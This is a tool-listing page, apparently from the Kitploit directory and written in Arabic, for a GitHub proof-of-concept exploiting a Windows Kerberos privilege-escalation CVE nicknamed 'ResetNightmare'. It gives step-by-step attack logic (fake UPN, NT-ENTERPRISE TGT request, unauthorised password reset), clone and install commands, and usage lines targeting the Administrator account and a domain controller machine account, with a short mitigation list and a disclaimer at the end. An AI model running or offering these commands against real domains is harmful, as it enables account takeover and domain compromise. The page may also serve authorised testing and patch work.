Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
المصادقة والترخيصتصعيد الامتيازاتهجمات كلمات المرورالاستغلالاختبار الاختراق
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

PoC لـ CVE-2026-27912 - رفع الامتيازات في Windows Kerberos (ResetNightmare). إعادة تعيين كلمة المرور بشكل غير مصرح به عبر ثغرة Kerberos. لأغراض البحث الأمني فقط.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
411منذ 28 أياملم تتم المراجعة بعد

Kerberos-CVE-2026-27912

CVE-2026-27912 - ثغرة رفع امتيازات في Windows Kerberos

ResetNightmare - إعادة تعيين كلمة مرور غير مصرح بها عبر خلل في بروتوكول Kerberos Change Password.


📋 التفاصيل

الحقلالقيمة
CVECVE-2026-27912
العنوانثغرة رفع امتيازات في Windows Kerberos
CVSSCVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CWECWE-285: Improper Authorization
نُشرت14 أبريل 2026
تم إصلاحهاأبريل 2026

🔍 خطوات الهجوم

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 المتطلبات

  • Windows مع PowerShell
  • وحدة ActiveDirectory (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (نزّلها من GhostPack/Rubeus)
  • وصول شبكي إلى وحدة تحكم المجال

🚀 التثبيت

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 الاستخدام

هجوم أساسي

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

استهداف حساب جهاز

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

إنشاء حساب جديد

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

الوضع التفصيلي

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 المعاملات


🛡️ التخفيف

  1. طبّق التصحيح الرسمي من تحديث أمان Microsoft
  2. قسّم الشبكة للحد من وصول الشبكات المجاورة
  3. طبّق مبدأ الامتياز الأقل - قيّد صلاحيات الكتابة على UPN
  4. راقب التغييرات المشبوهة في UPN وعمليات إعادة تعيين كلمات المرور

⚠️ إخلاء المسؤولية

لأغراض اختبار الأمان المصرح به والبحث التعليمي فقط.

الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. لا يتحمل المؤلف أي مسؤولية عن إساءة استخدام هذا البرنامج.


📚 المراجع

  • NVD: CVE-2026-27912
  • دليل تحديث أمان Microsoft

👨‍💻 المؤلف

n0vax1337 / باحث أمني


📄 الترخيص

رخصة MIT - انظر LICENSE


آخر تحديث: 2026

تنزيل الأداة
الخيارالوصفالافتراضي
-t / --targetاسم الحساب المستهدفمطلوب
-p / --new-passwordكلمة المرور الجديدة للهدفمطلوب
-u / --upn-userالحساب الذي سيتم تعيين UPN وهمي عليهمطلوب
-up / --upn-passwordكلمة مرور حساب UPNمطلوب
-c / --computerحساب UPNUser هو حساب جهازعلامة
-r / --rubeus-pathالمسار إلى Rubeus.exeRubeus.exe
-e / --encryptionنوع التشفير المدعومAES256
-path / --create-pathمسار OU لإنشاء حساب جديد""
-d / --dcاسم وحدة تحكم المجالاكتشاف تلقائي
-v / --verboseمخرجات تفصيليةعلامة